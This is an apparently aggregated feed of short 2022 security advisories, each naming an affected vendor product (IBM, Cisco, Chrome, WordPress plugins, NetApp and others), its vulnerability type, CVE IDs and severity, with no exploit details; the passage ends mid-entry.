CVE-2022-0608 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
A SQL injection vulnerability due to insufficient escaping and parameterization has been
discovered in WP Statistics WordPress plugin. The affected versions are WP Statistics
versions up to and including 13.1.5. The updated version 13.1.6 is available.
CVE ID: CVE-2022-0651 (Critical), CVE-2022-25149 (Critical), CVE-2022-25148
(Critical)
Trend Micro has released an update to address a Privilege Escalation vulnerability in Trend
Micro Antivirus for Mac. The update resolves a vulnerability in the product that allows a
local attacker to modify a file during the update process and escalate their privileges.
CVE ID: CVE-2022-24671
Oracle Solaris has released security update to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Trend Micro has released new security patches to resolve Denial of Service (DoS) and local
privilege escalation vulnerabilities in Apex One Windows platform.
CVE ID: CVE-2022-24678 (Medium), CVE-2022-24679 (High), CVE-2022-24680 (High)
Huawei has released security update to address privilege escalation vulnerability in Huawei
PCManager. Successful exploitation can allow an attacker to access certain resource beyond
its privilege.
CVE ID: CVE-2021-40046 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi has released security update to resolve Cross Site Scripting (XSS)
vulnerabilities in Electric's Energy Saving Data Collecting Server (EcoWebServerIII).
CVE ID: CVE-2016-10735 (Medium), CVE-2017-18214 (High), CVE2018-14040 (Medium),
CVE-2018-14042 (Medium), CVE-2018-20676 (Medium), CVE-2019-8331 (Medium), CVE-2020-7746
(High), CVE-2020-11022 (Medium), CVE-2020-11023 (Medium)
Apache has released security update to resolve multiple vulnerabilities in its products.
CVE ID: CVE-2021-44521 (High) , CVE-2022-22931 (Medium), CVE-2022-23206 (High),
CVE-2022-24112
Google Chrome has released version Chrome 98 (98.0.4758.101) for Android, Chrome 98
(98.0.4758.97) for iOS and Stable channel 98.0.4758.102 for Windows, Mac and Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-0603 (High), CVE-2022-0604 (High), CVE-2022-0605 (High),
CVE-2022-0606 (High), CVE-2022-0607 (High), CVE-2022-0608 (High), CVE-2022-0609 (High),
CVE-2022-0610 (Medium)
Dell has released security update to resolve credential disclosure vulnerability in EMC
Enterprise Storage Analytics for vRealize Operations.
CVE ID: CVE-2021-43590 (Medium)
NVIDIA has released a security update to resolve privilege escalation vulnerability in
Delegated License Service (DLS) virtual appliance component of NVIDIA License System.
CVE ID: CVE-2022-21818 (Medium)
Debian has released security update to resolve multiple vulnerabilities in Minetest package.
Successful exploitation can cause Lua code injection or Denial of Service (DoS) attack
against a Minetest server.
CVE ID: CVE-2022-24300 (Critical), CVE-2022-24301 (Medium)
Adobe has released security update to address an improper input validation vulnerability
which can cause arbitrary code execution in Adobe Commerce and Magento Open Source. The
affected versions are 2.4.3-p1 & earlier versions and 2.3.7-p2 & earlier
versions of all platform.
CVE ID: CVE-2022-24086 (Critical)
Debian has released security update to resolve multiple vulnerabilities in Expat- an XML
parsing C library. Successful exploitation can cause execution of arbitrary code or Denial
of Service (DoS) attack if a malformed XML file is processed.
CVE ID: CVE-2021-45960 (High), CVE-2021-46143 (High), CVE-2022-22822 (Critical),
CVE-2022-22823 (Critical), CVE-2022-22824 (Critical), CVE-2022-22825 (High), CVE-2022-22826
(High), CVE-2022-22827 (High), CVE-2022-23852 (Critical), CVE-2022-23990 (Critical)
WordPress has released security update to address multiple vulnerabilities in WordPress
versions prior to 5.9.2. Successful exploitation can allow a remote attacker to take control
of an affected website.
A SQL injection vulnerability due to insufficient escaping and parameterization has been
discovered in WP Statistics WordPress plugin. The affected versions are WP Statistics
versions up to and including 13.1.4. The updated version 13.1.5 is available.
CVE ID: CVE-2022-0513 (Critical)
Google Chrome Dev channel has been updated to 100.0.4878.0 for Windows, Linux and Mac, and
Beta channel has been updated to 99.0.4844.23 (Platform version: 14469.16.0) for most Chrome
OS devices.
Wireshark has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that Ifme, versions 1.0.0 to v.7.33.2 don't properly invalidate a
user's session even after the user initiated logout. Successful exploitation can cause reuse
of admin cookies either via local/network access or by other hypothetical attacks. The
update is available.
CVE ID: CVE-2021-25992 (Critical)
A persistent Cross-Site Scripting (XSS) vulnerability has been discovered in two input
fields within the administrative panel when editing users in the XMPie UStore application on
version 12.3.7244.0.
CVE ID: CVE-2022-23321
Moxa has released security updates to address cleartext transmission of sensitive
information & hard-coded credentials vulnerability in MXview Series Network Management
Software and EDR-G903, EDR-G902 & EDR-810 series secure routers.
CVE ID: CVE-2021-40390, CVE-2021-40392
Multiple vulnerabilities have been discovered in Samba that affects QNAP NAS. Successful
exploitation may allow to access sensitive information, run arbitrary commands and
impersonate existing services.
CVE ID: CVE-2022-0336, CVE-2021-44141, CVE-2021-44142
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released updated fixed software to resolve multiple critical vulnerabilities in
Cisco Small Business RV160, RV260, RV340, and RV345 series routers.
Multiple vulnerabilities have been discovered in various Palo Alto Networks products. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available.
CVE ID: CVE-2022-0016 (High), CVE-2022-0017 (High), CVE-2022-0020 (Medium),
CVE-2022-0011 (Medium), CVE-2022-0018 (Medium), CVE-2022-0019 (Medium), CVE-2022-0021 (Low)
Microsoft has released security updates to address multiple vulnerabilities in its products.
A remote attacker can exploit these vulnerabilities to take control of an affected system.
Jenkins has released security update to resolve XStream library’s vulnerability that can
cause Denial of Service (DoS). The affected versions are Jenkins weekly up to and including
2.333 & Jenkins LTS up to and including 2.319.2.
CVE ID: CVE-2022-0538, CVE-2021-43859
Drupal has released security update to address Cross Site Scripting (XSS) and access bypass
vulnerabilities in Custom Breadcrumbs module and Fancy File Delete module respectively.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has released security update to resolve an Elevation of Privilege Vulnerability
(EPV) in Print Spooler software affecting multiple Window products.
CVE ID: CVE-2022-22718 (High)
Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR.
An attacker can exploit these vulnerabilities to take control of an affected system.
WordPress has released security update to resolve a SQL injection vulnerability discovered
in Fancy Product Designer WordPress plugin. This vulnerability allows attackers with
administrative level permissions to inject arbitrary SQL queries to obtain sensitive
information. The affected versions are Fancy Product Designer versions up to and including
4.7.4.
CVE ID: CVE-2021-4134 (High)
Intel has released security updates to address multiple vulnerabilities in several Intel
products. A remote attacker can exploit these vulnerabilities to take control of an affected
system.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Zoom affecting several platforms. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available.
CVE ID: CVE-2022-22780 (Medium), CVE-2022-22779 (Low)
Multiple vulnerabilities have been discovered in Mitsubishi Electric's FA Engineering
Software Products. Mitsubishi Electric has released security updates to resolve these
vulnerabilities.
CVE ID: CVE-2021-20587 (High), CVE-2021-20588 (High), CVE-2020-14521
Sonicwall has released work around & update to resolve an insufficient check of null
pointer vulnerability in SonicWall SMA1000 SNMP. Successful exploitation of the
vulnerability can cause Denial of Service(DoS). The affected products are SonicWall SMA1000
12.4.1-02779 and earlier.
Multiple vulnerabilities have been discovered in Chromium, which can result in the execution
of arbitrary code, Denial of Service (DoS) or information disclosure. It is recommended to
upgrade the chromium packages.
CVE ID: CVE-2022-0452, CVE-2022-0453, CVE-2022-0454, CVE-2022-0455, CVE-2022-0456,
CVE-2022-0457, CVE-2022-0458, CVE-2022-0459, CVE-2022-0460, CVE-2022-0461, CVE-2022-0462,
CVE-2022-0463, CVE-2022-0464, CVE-2022-0465, CVE-2022-0466, CVE-2022-0467, CVE-2022-0468,
CVE-2022-0469, CVE-2022-0470
A directory traversal vulnerability has been discovered in Argo CD, open-source Continuous
Delivery (CD) platform which enables attackers to access sensitive information such as
passwords and API keys. The affected products are Argo CD before 2.1.9 and 2.2.x before
2.2.4. The updates are available.
CVE ID: CVE-2022-24348
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
CVE ID: CVE-2019-20444 (Critical), CVE-2019-20445 (Critical), CVE-2022-23307
(Critical), CVE-2022-23990 (Critical), CVE-2020-25638 (High), CVE-2021-22696 (High),
CVE-2021-4160 (Medium),CVE-2019-16869 (High), CVE-2020-7238 (High)
A Cross-Site Scripting (XSS) vulnerability has been discovered in Plus one product CSV+. The
affected products are CSV+ prior to 0.8.1.
CVE ID: CVE-2022-21241 (High)
Multiple vulnerabilities have been resolved in GitLab updated versions 14.7.1, 14.6.4, and
14.5.4 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Debian has released security update to resolve multiple vulnerabilities in Ruby.
CVE ID: CVE-2021-28965, CVE-2021-31799, CVE-2021-31810, CVE-2021-41817,
CVE-2021-41819, CVE-2021-32066, CVE-2021-41816
Multiple vulnerabilities such as integer coercion error and out-of-bounds write have been
discovered in FANUC's Equipment- R-30iA and R-30iB series controllers which can cause a
buffer overflow condition, Remote Code Execution (RCE) and can crash the device being
accessed.
CVE ID: CVE-2021-32996 (High), CVE-2021-32998 (High)
Dell PowerEdge has released security update to resolve information disclosure vulnerability
in Intel Solid State Drive (SSD) Data Center (DC) products.
CVE ID: CVE-2021-0148 (High)
NETGEAR has released security update to resolve pre-authentication command injection &
stack overflow vulnerabilities in several products. NETGEAR will not release fixes for the
vulnerabilities on EX6100v1 as it is outside of the security support period.
Johnson Controls has released security update to address Log4J Remote Code Execution (RCE)
vulnerability in PowerManage versions 4.0 to 4.8.
CVE ID: CVE-2021-44228 (Critical)
Google has released update Chrome Beta channel 99.0.4844.14 & Long Term Support (LTS)
channel update 96.0.4664.180 to resolve critical vulnerabilities for most ChromeOS devices.
Google has also released update Chrome Beta 99 (99.0.4844.16) for Android, Chrome 99 Beta
channel update 99.0.4844.17 for Windows & Linux ,99.0.4844.15 for Mac and Chrome Beta
update 99 (99.0.4844.18) for iOS to resolve multiple vulnerabilities.
CVE ID: CVE-2022-0096 (Critical), CVE-2022-0289 (Critical)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released a software security update to address multiple vulnerabilities in GPU
Display Driver that can cause Denial of Service (DoS) or memory corruption.
CVE ID: CVE-2022-21813 (Medium), CVE-2022-21814 (Medium), CVE-2022-21815 (Medium),
CVE-2022-21816 (Medium)
Cisco has released security update to resolve multiple critical vulnerabilities in Cisco
Small Business RV160, RV260, RV340, and RV345 series routers. Successful exploitation can
cause execution of arbitrary code/commands, elevate privileges, bypass authentication and
authorization protections, fetch and run unsigned software and Denial of Service (DoS).
CVE ID: CVE-2022-20699 (Critical), CVE-2022-20700 (Critical), CVE-2022-20701
(Critical), CVE-2022-20702 (Medium), CVE-2022-20703 (Critical), CVE-2022-20704 (Medium),
CVE-2022-20705 (High), CVE-2022-20706 (High), CVE-2022-20708 (Critical), CVE-2022-20707
(High), CVE-2022-20749 (High), CVE-2022-20709 (Medium), CVE-2022-20710 (Medium),
CVE-2022-20711 (High), CVE-2022-20712 (High)
Google has released Chrome versions 98.0.4758.80/81/82 for Windows and 98.0.4758.80 for Mac
and Linux, Beta channel 98.0.4758.79 (Platform version: 14388.44.0) for most Chrome OS
devices, Chrome 98 (98.0.4758.87) for Android, Chrome 98 (98.0.4758.85) for iOS, and Dev
channel 99.0.4844.16 for Windows, Linux and 99.0.4844.15 for Mac to address multiple
vulnerabilities.
It has been discovered that InsydeH2O Hardware-2-Operating System (H2O) UEFI firmware
contains multiple vulnerabilities related to memory management in System Management Mode
(SMM). The firmware update is available.
Multiple vulnerabilities have been discovered in multiple open-source and proprietary Object
Management Group (OMG) Data-Distribution Service (DDS) implementations. Successful
exploitation can result in Denial-of-Service (DoS) or buffer-overflow conditions, Remote
Code Execution (RCE) or information exposure. The affected products are CycloneDDS, FastDDS,
GurumDDS, OpenDDS, Connext DDS Professional, Connext DDS Secure, Connext DDS Micro, CoreDX
DDS.
Multiple vulnerabilities have been discovered in several Fortinet products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-36177 (Medium), CVE-2021-41016 (High), CVE-2021-43062 (Medium),
CVE-2021-43073 (High), CVE-2021-41018 (High), CVE-2021-36193 (Medium), CVE-2021-42753 (High)
An authenticated OS command injection vulnerability has been discovered in Ricon Mobile's
Equipment- Industrial Cellular router which can allow to inject and execute arbitrary shell
commands as an Admin user.
CVE ID: CVE-2022-0365 (Critical)
It has been discovered that Advantech's Equipment- ADAM-3600 uses hard-coded cryptographic
key inside the project folder which may allow an attacker to achieve Web Server login and
perform unauthorized access to intercept traffic.
CVE ID: CVE-2022-22987 (Critical)
A critical Remote Code Execution (RCE) vulnerability has been resolved in Essential Addons
for Elementor , a popular WordPress plugin. The affected versions are Essential Addons for
Elementor version 5.0.4 and older.
My Cloud OS 5 has released Firmware 5.19.117 to improve the security of My Cloud OS 5
devices.
CVE ID: CVE-2020-25717, CVE-2020-21913, CVE-2022-22991, CVE-2022-22994,
CVE-2022-22989, CVE-2022-22990, CVE-2022-22992, CVE-2022-22993
A Cross-Origin Resource Sharing (CORS) vulnerability has been discovered in NVIDIA Omniverse
Launcher. Successful exploitation can lead to code execution, escalation of privileges and
impact to confidentiality and integrity. NVIDIA has released a software update to address
the issue.
CVE ID: CVE-2022-21817 (Critical)
A reflected Cross-Site Scripting (XSS) has been discovered in Fotobook WordPress plugin
versions up to and including 3.2.3.
CVE ID: CVE-2022-03801 (Medium)
VMware has released security update to resolve an information disclosure vulnerability in
VMware Cloud Foundation SDDC Manager.
CVE ID: CVE-2022-22939 (Medium)
It has been discovered that Samba vfs_fruit module allows out-of-bounds heap read and write
via extended file attributes. This vulnerability allows a remote attacker to execute
arbitrary code with root privileges.
CVE ID: CVE-2021-44142
Multiple critical vulnerabilities have been discovered in NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22822 (Critical), CVE-2022-22823 (Critical), CVE-2022-22824
(Critical), CVE-2022-23218 (Critical), CVE-2022-23219 (Critical), CVE-2021-22060 (Medium),
CVE-2021-41817 (High), CVE-2022-22846 (Medium), CVE-2022-22825 (High), CVE-2022-22826
(High), CVE-2022-22827 (High), CVE-2021-45485 (High)
IBM has released security update to fix Apache Log4j vulnerability in IBM Spectrum Scale.
The affected products are IBM Spectrum Scale versions 5.0.0 - 5.0.5.11 (All HDFS
Transparency versions) and 5.1.0 - 5.1.1 (HDFS Transparency version - 2.7.3 - 3.1.0).
CVE ID: CVE-2021-4104 (High)
An information disclosure vulnerability has been discovered in AMD Platform Security
Processor (PSP) chipset driver affecting multiple Dell products. This vulnerability allows
low privileged malicious users to access and leak data through the AMD Chipset Driver. The
updates are available.
CVE ID: CVE-2021-26333 (Medium)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Symfony due to
recent change in configuration loading. The affected Symfony products are versions 5.3.14,
5.4.3, and 6.0.3. This issue has been resolved in versions 5.3.15, 5.4.4, and 6.0.4.
Oracle Solaris has released security update to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Google has released security update for Chrome Beta 99 (99.0.4844.7) for iOS, Stable channel
97.0.4692.102 for most Chrome OS devices and Dev channel 99.0.4844.11 for Windows, Mac and
Linux.
A carry propagation bug has been discovered in the MIPS32 and MIPS64 squaring procedure. The
affected OpenSSL versions are 1.0.2, 1.1.1 and 3.0.0. The updates are available.
CVE ID: CVE-2021-4160
Multiple vulnerabilities have been discovered in Fresenius Kabi's Equipment- Agilia Connect
Infusion System. Successful exploitation of these vulnerabilities can allow an attacker to
gain access to sensitive information, modify settings or parameters or perform arbitrary
actions as an authenticated user. The updates are available.
Multiple vulnerabilities such as access bypass and information disclosure have been
discovered in Private Taxonomy Terms module for Drupal. This module enables users to create
'private' vocabularies. The updates are available.
It has been discovered that all network connected Xerox VersaLink business printers and copy
machines are susceptible to Denial of Service (DoS) attack via a crafted TIFF file in an
unauthenticated HTTP POST request.
CVE ID: CVE-2022-23968
Debian has released security updates to resolve multiple vulnerabilities in uriparser, a
library that parses Uniform Resource Identifiers (URIs).
CVE ID: CVE-2021-46141, CVE-2021-46142
It has been discovered that Embed Swagger WordPress plugin is vulnerable to reflected
Cross-Site Scripting (XSS) due to insufficient escaping/sanitisation and validation.
CVE ID: CVE-2022-0381 (Medium)
Huawei has released security update to resolve laser command injection vulnerability in
versions earlier than AIS-BW80H-00 9.0.3.4(H100SP13C00).
CVE ID: CVE-2021-40043 (High)
An insufficient check for user-provided input has caused Cross Site Scripting (XSS)
vulnerability in Navbar module for Drupal. The updates are available.
An improper restriction of XML external entity reference and path traversal vulnerabilities
have been discovered in GE Gas Power's Equipment- ToolBoxST. Successful exploitation can
result in data exfiltration or arbitrary write, overwrite and execution. The affected
products are ToolBoxST OS all versions prior to 07.09.07C.
CVE ID: CVE-2021-44477 (High), CVE-2018-16202 (Medium)
A Cross Site Scripting (XSS) & directory traversal vulnerabilities have been discovered
in TransmitMail. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-22146 (Medium), CVE-2022-21193 (Medium)
A privilege escalation vulnerability has been discovered in polkit’s pkexec, a SUID-root
program that is installed by default on every major Linux distribution. Successful
exploitation of this vulnerability allows any unprivileged user to gain full root privileges
on a vulnerable host in its default configuration.
CVE ID: CVE-2021-4034
Trend Micro has released security update to resolve directory traversal and code injection
vulnerabilities in Deep Security Agent & Cloud One - Workload Security for Linux.
CVE ID: CVE-2022-23119 (High), CVE-2022-23120 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-41819 (High), CVE-2021-44716 (High), CVE-2021-45485 (High),
CVE-2021-45960 (High), CVE-2021-46143 (High)
Multiple vulnerabilities have been discovered in Moodle. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0335, CVE-2022-0334, CVE-2022-0333, CVE-2022-0332
Multiple vulnerabilities have been discovered in Zimbra- a WebRTC stream aggregator. It is
recommended to use Patch 23 for Zimbra 9.0.0 and Patch 30 for Zimbra 8.8.15.
Solarwinds has released security update to resolved Hibernate Query Language (HQL) injection
vulnerability in Web Help Desk software which allows an attacker to execute Hibernate SQL
queries against the database models defined in the source code..
CVE ID: CVE-2021-35232
Multiple vulnerabilities such as file inclusion, and file write have been discovered in
CentOS Web Panel also known as Control Web Panel (CWP). Successful exploitation of
vulnerabilities can lead to Remote Code Execution (RCE).
CVE ID: CVE-2021-45467, CVE-2021-45466
Multiple vulnerabilities have been discovered in various PrinterLogic's products. The
affected products are PrinterLogic Web Stack version 19.1.1.13 SP9 and earlier, PrinterLogic
Virtual Appliance version 20.0.1304 and earlier and PrinterLogic SaaS. The updates are
available.
CVE ID: CVE-2021-42631, CVE-2021-42633, CVE-2021-42635,
CVE-2021-42637,CVE-2021-42638, CVE-2021-42639, CVE-2021-42640, CVE-2021-42641,
CVE-2021-42642
McAfee has released security update to address a SQL injection vulnerability in Data Loss
Protection (DLP) ePO extension. Versions prior to 11.8.100, 11.7.101 and 11.6.401 are
affected.
CVE ID: CVE-2021-4088 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-41819 (High), CVE-2021-44716 (High), CVE-2021-45485 (High),
CVE-2021-45960 (High), CVE-2021-46143 (High), CVE-2021-45115 (High), CVE-2021-45116 (High),
CVE-2021-45452 (Medium)
Multiple vulnerabilities have been discovered in Philips' Equipments- Vue PACS. An attacker
can exploit these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The security updates are available.
Multiple vulnerabilities have been discovered in Mitsubishi Electric's Equipment- GENESIS64,
MC Works64, GOT2000 series, GOT SIMPLE series, SoftGOT2000 and Tension Controller. An
attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-23128 (Critical), CVE-2022-23130 (Medium), CVE-2022-23129 (High),
CVE-2022-23127 (Medium), CVE-2020-5675 (High)
Zabbix has released security update to resolve authentication bypass/instance takeover
vulnerability in Frontend(F) component. The affected product are Frontend (F) version 5.4.0
- 5.4.8 & 6.0.0alpha1.
CVE ID: CVE-2022-23131 (Critical)
Citrix has released security update to resolve buffer overflow vulnerability in Citrix
Application Delivery Controller (ADC) formerly known as NetScaler ADC and Citrix Gateway,
formerly known as NetScaler Gateway platforms.
CVE ID: CVE-2019-0140 (High)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in Canon laser
printers and small office multifunctional printers. The updates are available.
CVE ID: CVE-2021-20877 (Medium)
Drupal has released security update to address a Cross Site Scripting (XSS) vulnerability in
jQuery UI 1.13.0.
CVE ID: CVE-2021-41182 (Medium), CVE-2021-41183 (Medium), CVE-2016-7103,
CVE-2010-5312
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities has been discovered in several Huawei Products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2021-40042 (Medium), CVE-2021-40033 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20649 (Critical), CVE-2022-20648 (Medium), CVE-2022-20685 (High),
CVE-2022-20655 (High), CVE-2022-20654 (High)
Google has released security update for Chrome Beta 98 (98.0.4758.63) for Android and iOS,
extended stable channel 96.0.4664.174 for Windows and Mac and stable channel 97.0.4692.99
for Windows, Mac and Linux.
CVE ID: CVE-2022-0289 (Critical), CVE-2022-0290 to CVE-2022-0298 (High),
CVE-2022-0300 to CVE-2022-0306 (High), CVE-2022-0307 to CVE-2022-0311 (Medium)
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-42392 (Critical), CVE-2021-43818 (High), CVE-2021-44832 (Medium),
CVE-2021-4044 (Medium), CVE-2021-42550 (Medium), CVE-2021-45105 (Medium)
F5 Networks has released security updates to address multiple vulnerabilities in MySQL
Server component of Oracle MySQL. An attacker can exploit these vulnerabilities to take
control of an affected device.
CVE ID: CVE-2017-3308 (High), CVE-2017-3456 (Medium), CVE-2017-3464 (Medium),
CVE-2020-2780 (Medium)
An improper input validation vulnerability has been discovered in Serv-U. The affected
versions are Serv-U 15.2.5 & previous versions. The updates are available.
CVE ID: CVE-2021-35247 (Medium)
An overwrite & persistent password reset poisoning vulnerabilities have been discovered
in Umbraco CMS configuration element "UmbracoApplicationUrl". The updates are available.
CVE ID: CVE-2022-22691 (Medium), CVE-2022-22690 (High)
Oracle has released its critical patch update for January 2022 to address 497
vulnerabilities across multiple products. A remote attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-21391 (Critical), CVE-2022-21390 (Critical), CVE-2022-21389
(Critical), CVE-2022-21306 (Critical), CVE-2022-21276 (Critical), CVE-2022-21275 (Critical),
CVE-2021-35683 (Critical), CVE-2021-35587 (Critical)
A Denial of Service (DoS) vulnerability has been discovered in VMware Workstation and
Horizon Client for Windows. Successful exploitation may trigger a DoS condition in the
Thinprint service running on the host machine where VMware Workstation or Horizon Client for
Windows is installed. The updates are available.
CVE ID: CVE-2022-22938 (Medium)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in various WordPress
plugins. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-0233 (Medium), CVE-2022-0232 (Medium)
Multiple vulnerabilities such as command injection and privilege escalation have been
discovered in McAfee Agent (MA) for Windows. It is recommended to install or update to
McAfee Agent 5.7.5 release.
CVE ID: CVE-2021-31854 (High), CVE-2022-0166 (High)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
An Authentication Bypass vulnerability has been discovered in ManageEngine Desktop Central
and Desktop Central MSP. This vulnerability can allow an attacker to read unauthorized data
or write an arbitrary zip file on the server.
CVE ID: CVE-2021-44757 (Critical)
Ivanti has updated its Log4j advisory with security updates for multiple products to address
the vulnerability. An unauthenticated attacker can exploit this vulnerability to take
control of an affected system.
CVE ID: CVE-2021-44228 (Critical)
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-45046 (Critical), CVE-2021-44228 (Critical), CVE-2021-45105
(Medium), CVE-2021-22096 (Medium)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-23094, CVE-2022-0217
It has been discovered that NUUO NVRmini2 (Network Video Recorder) through 3.11 allows an
unauthenticated attacker to upload an encrypted TAR archive, which can be abused to add
arbitrary users because of the lack of handle_import_user.php authentication. When combined
with another flaw (CVE-2011-5325), it is possible to overwrite arbitrary files under the web
root and achieve code execution as root.
CVE ID: CVE-2022-23227
Dell has released security updates for AMD Graphics Driver Vulnerabilities for Windows 10
that may be exploited by malicious users to compromise the affected systems.
Multiple vulnerabilities such as Unauthenticated Sensitive Data Disclosure, and Stored
Cross-Site Scripting have been discovered in various WordPress plugins. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0236 (High), CVE-2021-4074 (Medium), CVE-2022-0210 (Medium)
F5 Networks has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
device.
CVE ID: CVE-2021-3506, CVE-2021-28660, CVE-2021-28952, CVE-2017-3309, CVE-2017-3453,
CVE-2019-2974
It has been discovered that in doRead of SimpleDecodingSource.cpp, there is a possible out
of bounds write vulnerability due to an incorrect bounds check. This can lead to remote
escalation of privilege with no additional execution privileges needed.
CVE ID: CVE-2021-39623 (Critical)
Juniper Networks has released security updates to resolve multiple vulnerabilities in
Juniper Networks products. An attacker can exploit these vulnerabilities to take control of
an affected system.
CVE ID: CVE-2021-44228 (Critical), CVE-2021-45046 (Critical), CVE-2021-31385 (High),
CVE-2021-4104 (High), CVE-2021-42550 (Medium)
Multiple vulnerabilities have been discovered in NetApp Products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-44548 (Critical), CVE-2021-38931 (Medium), CVE-2021-29678 (High),
CVE-2021-38926 (Medium), CVE-2021-39002 (High), CVE-2021-44733 (High), CVE-2021-45469
(High), CVE-2021-4008 (High), CVE-2021-4009 (High), CVE-2021-4010 (High), CVE-2021-4011
(High)
Microsoft has released security updates to resolve elevation of privilege vulnerability in
Win32k affecting multiple Windows products.
CVE ID: CVE-2022-21882 (High)
It has been discovered that Mattermost Focalboard is vulnerable to Insufficient Session
Expiration vulnerability. When a user initiates a logout, their session is not invalidated
properly. In addition, user sessions are stored in the browser's local storage, which by
default does not have an expiration time. This makes it possible for an attacker to steal
and reuse the cookies using techniques such as XSS attacks, to completely take over a victim
account.
CVE ID: CVE-2022-22122 (Critical)
Multiple vulnerabilities have been discovered in Hitachi Energy's Equipment- e-mesh Energy
Management System. An attacker can exploit these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2020-8174 (High), CVE-2020-8265 (High), CVE-2020-11080 (High),
CVE-2021-22883 (High)
A release of illegal memory vulnerability has been discovered in the snmpd daemon of Juniper
Networks Junos OS, Junos OS Evolved that allows an attacker to halt the snmpd daemon causing
a sustained Denial of Service (DoS) to the service until it is manually restarted.
CVE ID: CVE-2022-22177 (Medium)
Multiple vulnerabilities have been discovered in the Link Layer Discovery Protocol (LLDP)
implementation for Cisco Small Business 220 Series Smart Switches. An unauthenticated
adjacent attacker can execute code or can cause LLDP database corruption on the affected
device.
CVE ID: CVE-2021-34779 (High), CVE-2021-34780 (High), CVE-2021-34775 (Medium),
CVE-2021-34776 (Medium), CVE-2021-34777 (Medium), CVE-2021-34778 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that Password Manager MIRUPASS PW10/PW20 contains a missing
encryption vulnerability. An attacker can exploit this vulnerability to take control of an
affected system.
CVE ID: CVE-2022-0183 (Medium)
It has been discovered that Label printers TEPRA PRO SR5900P/SR-R7900P contains an
insufficiently protected credentials vulnerability. An attacker can exploit this
vulnerability to take control of an affected system.
CVE ID: CVE-2022-0184 (Medium)
Multiple vulnerabilities have been discovered in Citrix Hypervisor, which can allow
privileged code in a guest VM to cause the host to crash or become unresponsive. An attacker
can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-28704, CVE-2021-28705, CVE-2021-28714, CVE-2021-28715
It has been discovered that systemd-tmpfiles employed uncontrolled recursion when removing
deeply nested directory hierarchies. A local attacker can exploit this to cause
systemd-tmpfiles to crash or have other unspecified impacts.
CVE ID: CVE-2021-3997
Multiple vulnerabilities such as NULL Pointer Dereference, Integer Underflow, Out-of-Bounds
Read, and Memory Leak have been discovered in Moxa's Equipment- VPort 06EC-2V Series IP
Cameras and VPort 461A Series Video Servers. An attacker can exploit some of these
vulnerabilities to take control of an affected system.
Apple has released security update to address a Denial of Service vulnerability in iOS
